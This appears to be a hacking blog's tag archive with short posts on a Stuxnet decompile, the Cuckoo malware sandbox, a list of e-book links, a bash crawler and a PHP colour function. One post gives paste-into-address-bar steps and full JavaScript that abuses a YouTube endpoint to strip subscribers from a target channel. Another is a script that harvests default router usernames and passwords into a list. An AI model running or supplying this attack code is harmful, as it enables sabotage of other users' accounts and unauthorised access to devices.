The Hack o blog

Reinventing the weel

Tag Archives: Languages

An Anonymous hacker decompiles Stuxnet, posts on Github.

SVG version of Bug silk.png by Avatar

Image via Wikipedia

An Anonymous hacker de-compiles StuxNet, and posts source code on Github.

Stuxnet is a Windows computer worm discovered in July 2010 that targets industrial software and equipment While it is not the first time that hackers have targeted industrial systems, it is the first discovered malware that spies on and subverts industrial systems, and the first to include a programmable logic controller (PLC) rootkit.

https://github.com/Laurelai/decompile-dump

Advertisements

cuckoobox automated open source malware analysis.

cuckoobox


Cuckoo is a very simple automated malware analysis sandbox.

It started as a project developed during Google Summer of Code 2010 within The Honeynet Project organization. During that period, under the guidance of my mentor Felix Leder, the basis were thrown to what Cuckoo has grown to be now.

The ideas behind the development of Cuckoo are:
• provide a completely Open Source product to be released under GPL, both in order to allow everyone to customize it as much as possible, as well as in order to make it grow to what could become a community-effort designed tool.
• provide an instrument able to analyze any kind of malicious file and get the best behavioral analysis out of it.
• provide a sandbox which can be configured to run both on virtual machines as well as on metal.
• make it able to be distributed.

Cuckoo still has a long road ahead before achieving all the goals that were initially set, but it is on the right path ;-).

Current Features
  • Retrieve files from remote URLs and analyze them.
  • Trace relevant API calls for behavioral analysis.
  • Recursively monitor newly spawned processes.
  • Dump generated network traffic.
  • Run concurrent analysis on multiple machines.
  • Support custom analysis package based on AutoIt3 scripting.
  • Intercept downloaded and deleted files.
  • Take screenshots during runtime.

http://www.cuckoobox.org/

List of hacker e-books.

A Shebang, also Hashbang or Sharp bang. This i...

Image via Wikipedia

Here is a list of e-books
Ralphb.net – direct link to IP-subnetting Tutorial…long enough to be a small e-book, rather than a tutorial.
Astalavista – You’ll find links for news, affiliates, a place to submit your programs and/or tutorials. Go way down
to see the tuts. An impressive selection of topics: access control (firewalls, social engineering), miscellaneous, crypto, software
cracking, ICQ, IRC, online security, intrusion detection, chat systems, hacking/security groups, protocols, denial of service, OS‘s, network auditing, securing papers, and the basics.
Nopayweb.com – over 500 e-books, listed by category…programming languages, database, internet, application, OS’s, networks, sci&tech.
Freeskills – features e-books and tutorials, with the intention of teaching people IT skills. It also has job listings and courses. Despite the name, it’s not free. The books links eventually lead you to the order form on Amazon.com, and to take the courses, you must be a member, which is 99$.
Extremetech – multi purpose site with info on audio/video, security, and OS’s. There are also tech articles, news stories, and a BBS.
Code guru – This link takes you to the C++ section of the site. Also links to other departments…like java, and visual basic. Also has a forum. It’s one of those sites that shows you how to do various things…using regular expressions for search/replace, handling
structure storage, and other things like that.
Tunes.org – Direct link to an e-book, called Review of Existing Languages.
Programmer’s Heaven – Great site, that offers info on every programming language. Also has a forum and downloads/source codes.
Planet Zikri -Nice collection, but poorly organized…alphebetical, rather than
subject…one interesting find, was a wargame manual. It has lot’s of books that I’ve never seen offered online anywhere else.
Instinct.org – This is an archive of interesting texts texts by people that have released the copyright of their books and allowed other to freely redistribute them.

Flashdance.cx – Nice selection of text files, most descriptions in Swedish but subject material can usually be figured out by file name.
Free-edFree online courses for a number of things computer related, or not.
Freebooks – A number of free books, most notably in the areas of programming, internet, and OS’s. The sight is Russian, and some of the books are in Russian, but many are in English, so it’s worth a look .
http://www.textfiles.com – goes directly to a
page that shows you mirrors for the site and affiliates/member sites. You choose a mirror, hit the button, then it finally lists it’s topics. There are many topics, most of them not computer related, but still quite a bit of what your looking for. A lot of this seems old, though.
http://www.freebsd.org/docs.html – Documentation project for FreeBSD….including books, other websites, links, and articles.
http://www.ucs.ed.ac.uk/~unixhelp/index.html – A site designed to provide a flexible introduction and reference for users of the UNIX operating system.
http://www.uwsg.indiana.edu/usail/ – Unix System Administration Independent Learning
http://www.oreilly.com/openbook/ – A list of “open copywritten” books from O’Reilly’s.
http://networking.oreilly.com/ – Another O’Reilly site, featuring alot of networking books, from wireless networking to TCP/IP for Windows…
http://theory.lcs.mit.edu/~rivest/crypto-security.html – This page contains pointers to other web pages dealing with cryptography and security.
http://en.tldp.org/docs.html – The Linux Documentation Project.
http://techpubs.sgi.com/library/tpl/cgi-bin/init.cgi – Techpubs Library…a small list of links to other info, man pages, and FAQ’s.
http://www.redbooks.ibm.com/ – The official IBM Redbooks site.
http://www.tru64unix.compaq.com/docs/index.html – The Tru64 UNIX Publications Web site provides online access to the Tru64 UNIX documentation, reference pages, and documentation for related products.
http://www.cs.bell-labs.com/cm/cs/pearls/ – Programming Pearls, 2nd edition.
http://www.cprogramming.com/tutorial.html – A list of tuts for programming in C++, as well as some other links.
http://www.cs.virginia.edu/c++programdesign/slides/ – A slide show from some class…featuring a little bit of basic info.
http://www.icce.rug.nl/documents/cplusplus/ – A book for C users who want to make the transition to C++.
http://www.webdesigns1.com/perl/ir.html – A small list of Perl info / links, etc.
http://www.ictp.trieste.it/texi/perl/perl_toc.html – Perl Manual (Texinfo version) for perl version 4.0 patchlevel 36, Edition 0.6, dated 13 September 1993, printed on 25 March 1994.
http://www.cs.brown.edu/cgc/java2.da…ook/index.htmlData Structures and Algorithms in Java.
http://www.adahome.com/Tutorials/ – A list of Computer-Assisted Tutorials and resources for learning ADA.
http://www.cacr.math.uwaterloo.ca/hac/ – Handbook af applied Cryptography.
http://tronche.com/gui/x/Info and documentation on the X Window system.
http://developer.gnome.org/doc/GGAD/ggad.html – GTK+ / Gnome Application Development.
http://www.troll.no/qt/ – Trolltech Documentation.
http://perso.wanadoo.es/antlarr/tutorial.html – A KDE tutorial.
http://www.cs.wisc.edu/~chilimbi/Pubs.html – A small list of publications on CCDS.
http://www.sysadminmag.com/ – A journal for Unix System admins.
http://www.firstmonday.dk/issues/ – A list of issues from First Monday.
http://www.ibm.com/ibm/history/story/text.html – The IBM archives.
http://www.dspguide.com/pdfbook.htm – The Scientist and Engineer’s Guide to Digital Signal Processing.
http://hwb.sunsite.dk/ – “Hardware Book! This is Your free reference guide to electronics.”
http://www.cisco.com/univercd/cc/td/doc/product/ – Cisco Product Documentation, featuring hubs, adapters, routers, etc.
http://developer.novell.com/research/index.htm – Novell AppNotes.
http://www.symbols.com/ – SYMBOLS.com, the world’s largest online encyclopedia of graphic symbols.
http://www.divinecomedy.org/divine_comedy.html – The Research Edition of the Divine Comedy by Dante Alighieri. This site features three full editions of the Divine Comedy online: the original Italian text, and English translations by Henry Wadsworth Longfellow and Rev. H.F. Cary.
http://digital.library.upenn.edu/books/ – The Online Books page…a nice list of books online.
http://www.ipl.org/reading/books/ – The IPL Books Collection (formerly known as Online Texts) contains over 20,000 titles that can be browsed by author, by title, or by Dewey Decimal Classification.
http://www.infomotions.com/alex/ – The Alex Catalogue of Electronic Texts is a collection of public domain documents from American and English literature as well as Western philosophy.
http://www.octavo.com/ – Octavo Digital Rare Books.
http://www.promo.net/pg/ – Project Gutenberg.
http://www.lysator.liu.se/runeberg/katalog.html – Project Runeberg.
http://lcweb.loc.gov/exhibits/scrolls/toc.html – A site featuring info from the Dead Sea Scrolls.
http://impact.arc.nasa.gov/ – Asteroid and Comet Impact Hazards.
http://www.boulder.swri.edu/clark/ncar.html – A paper on the asteroid/comet impact hazard.
http://www.pbs.org/wnet/hawking/html/home.html – Stephen Hawking’s Universe.
http://www.dibonsmith.com/constel.htm – The Constellations.
http://virtualsites.ezthemes.com/sof…hp?catid=s_146 – Virtual Free Books.
http://www.blackcode.com/ – Blackcode.
http://neworder.box.sk/ – NewOrder Box.
http://www.cyberarmy.net/ – CyberArmy.
http://www.infosecwriters.com/ – Infosec Writers.

http://www.gutenberg.org/audio/ – Audio Gutenberg
http://verkaro.com/audio/doku.php – Free audio books and poetry
http://www.otrcat.com/ – Old time radio
http://www.mercurytheatre.info/ – The Mercury Theatre Plays, (‘War of the worlds’)
http://www.jimkelly.net/index.php?op…d=16&Itemid=41 – Jim Kelly’s Free Reads
http://www.itconversations.com/ – High quality IT talk
http://www.cbc.ca/quirks/ – BBC Science show ‘Quirks & Quarks’
http://ask.slashdot.org/article.pl?s…&tid=188&tid=4 – Slashdot artical on free audio for commute or learning
http://www.arstechnica.com – Articles on Computer hardware, some reference manuals. Unfortunately not very intuitive for newbs in the hardware arena.
http://www.sacred-texts.com This site hosts a HUGE collection of texts related with religion, mysticism, folk lore and so on…

http://groups.google.com/group/freecomputerbooks/web
http://en.wikibooks.org/wiki/Wikiboo…ence_bookshelf
http://www.techbooksforfree.com/

http://www.underground-systems.org/forums/showthread.php?127-Ebook-Links-UPDATED-4-22-08

YouTube subscriber glitch Fred and TunderF00T got hacked

Anonymous with Guy Fawkes masks at Scientology...

Anonymous with Guy Fawkes masks ...

Today multiple YouTube accounts got “hacked” it’s still going on the attack was perpetrated by the /B/tards of the ever more infamous 4Chan ” thanks moot”, accounts that were effected includes Fred and TunderF00t ,the problem has not yet been sorted, the  YouTube subscriber glitch allows an attacker to take out all of the subscribers of a channel, it uses a hole in the JavaScript lack of verification.

I will wright up how this script worked but for now here is the malicious code.

This is how it works, the script in the API usually requires a user to validate the action , the script overrides that and picks a random user to validate and un-subscribes them, the user isn’t in actuality un-subscribed and the counter is mealy decremented.YouTube  have had problems in the past with the counters being artificially increased, they haven’t fixed the problem and all they do is recount the subscribers.

DO not do this!!

1 Locate The target channel and subscribe

2 Open multiple page tabs

3 Paste this code into the browsers address bar

javascript:function unsubscribe() {
httpreq=new XMLHttpRequest();
httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false);
httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC'));
if(!httpreq.responseXML) {
setTimeout('unsubscribe()', timeout);
return;
}
if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!=' </address>
<h2>You have successfully unsubscribed.</h2>
') {
alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue);
} else if((window.status=++count)!=times) {
setTimeout('unsubscribe()', timeout);
} else {
alert('DUN');
}
}
count=0;
if((username=prompt('enter target\'s username', '\\*username here *\\'))!=null) {
if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) {
if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) {
unsubscribe();
}
}
}
void(0);

A quick note the code no longer works, there will be more attacks like this in the future so make sure you subscribe for more tips and hacks from the HackOBlog team, thanks to InfouPlink for the plug

A web crawler in bash

Web-crawler !!

Web-crawler !!

A web crawler in bash.

Forum master Scubudus posted on one of my favorite forums, a simple web crawler in bash. so I thought I would let you all in.

#!/bin/bash
#
#  [ 3/6/2009 ]       Bash Crawler       Scubidus[at]darckoncepts.org
#
#  Parse all Passwords and  Usernames from cirt.net and put them into a file
# with the following  format.   :product:user:pass:
#
#
url='http://www.cirt.net/passwords'
output='pass.lst'
cfile='.cookies.txt'
buffer='.buffer.txt'
pbuf='.parseBuffer.txt'</code>

declare  vflag=0

function error {
echo "Failed To Parse Data, No  Content Was found."
}

trap "rm -f ${cfile} ${buffer} ${pbuf};  exit" 0 1
trap "echo ' Ctrl+C Detected, output deprecated.'; exit" 2 3

while  getopts ":av:" flag; do
case $flag in
a) echo '[+]  Default Router Password Parser, Coded By Scubidus[at]darckoncepts.org'  &amp;&amp; exit;;
*) vflag=1;;
#?) echo 'Usage: No  Parameters Are Needed; -a for an about, -v for verbose';;
esac
done

echo  -n &gt; "${buffer}"; echo -n &gt; "${output}"

wget -q -O -  ${url} --referer="${url}" --keep-session-cookies  --save-cookies="${cfile}" &gt; "${buffer}"

spos=`cat "${buffer}" |  grep -n "table width" | awk -F: '{ print $1 }'`
epos=`cat  "${buffer}" | grep -n "/table&gt;" | awk -F: '{ print $1 }'`
lineCount=$(($epos-$spos))

cat  ${buffer} | head -$((${epos})) | tail -$((${lineCount}-1)) &gt;  ${buffer}

count=1
for each in `grep vendor "${buffer}" | cut  -f 2 -d ? | cut -f 1 -d '"' | sed s/\ /+/g`; do
url_buf="${url}?${each}"

if [ $vflag -eq 1 ]; then
echo ${count}  ${url_buf}
fi

let count=$((${count}+1))
wget -q -O - ${url_buf} --referer="${url}" --load-cookies="${cfile}"  --keep-session-cookies --save-cookies="${cfile}" &gt; "${buffer}"

epos=`grep -n '&lt;div id="block-block-7"&gt;' "${buffer}" | awk -F: '{ print $1 }'`
spos=`grep  -n '&gt;1. &amp;nbsp;' "${buffer}" | awk -F: '{print $1}'`

head -$epos "${buffer}" | tail -$(($epos-$spos)) &gt; "${buffer}" ||  error
vals=`cat "${buffer}" | grep -n "&lt;/table&gt;" | awk -F:  '{print $1}'`

lastVal=0
for i in $vals; do
if [  ${lastVal} -eq 0 ]; then
head -$i ${buffer} &gt; "${pbuf}"

echo -n ":`grep 'Product' ${pbuf} | cut -f 2 -d % | cut -f 2 -d  \&gt; | cut -f 1 -d \&lt;`" &gt;&gt; ${output}
echo -n  ":`grep 'User ID' ${pbuf} | cut -f 2 -d % | cut -f 2 -d \&gt; | cut -f 1  -d \&lt;`" &gt;&gt; ${output}
echo ":`grep 'Password'  ${pbuf} | cut -f 2 -d % | cut -f 2 -d \&gt; | cut -f 1 -d \&lt;`:"  &gt;&gt; ${output}

lastVal=$i
else
head -$i ${buffer} | tail -$(($i-$lastVal)) &gt; "${pbuf}"

echo -n ":`grep 'Product' ${pbuf} | cut -f 2 -d % | cut -f 2 -d  \&gt; | cut -f 1 -d \&lt;`" &gt;&gt; ${output}
echo -n  ":`grep 'User ID' ${pbuf} | cut -f 2 -d % | cut -f 2 -d \&gt; | cut -f 1  -d \&lt;`" &gt;&gt; ${output}
echo ":`grep 'Password'  ${pbuf} | cut -f 2 -d % | cut -f 2 -d \&gt; | cut -f 1 -d \&lt;`"  &gt;&gt; ${output}

lastVal=$i
fi
done
done

http://www.grayhoods.org/viewtopic.php?f=57&t=1526

PHP – Random Hex Colour

Vector logo of the PHP programming language wi...

Image via Wikipedia

Something useful I think anyone who uses PHP might like… this small function will return a random Hex value which converts to a colour (I.E. #FF0000 = Red, #00FF00 = Green, #0000FF = Blue etc). It’s small but it might come in handy one day so take a note of it!

<div style="border: 1px solid #FFF; background: #DDD; color: #000; padding-left: 15px;"><code><?php
function random_color() {
for ($i = 0; $i<6; $i++) {
$c .= dechex(rand(0,15));
}
return "#$c";
}
echo random_color();
?></code></div>
<div style="border: 1px solid #FFF; background: #DDD; color: #000; padding-left: 15px;">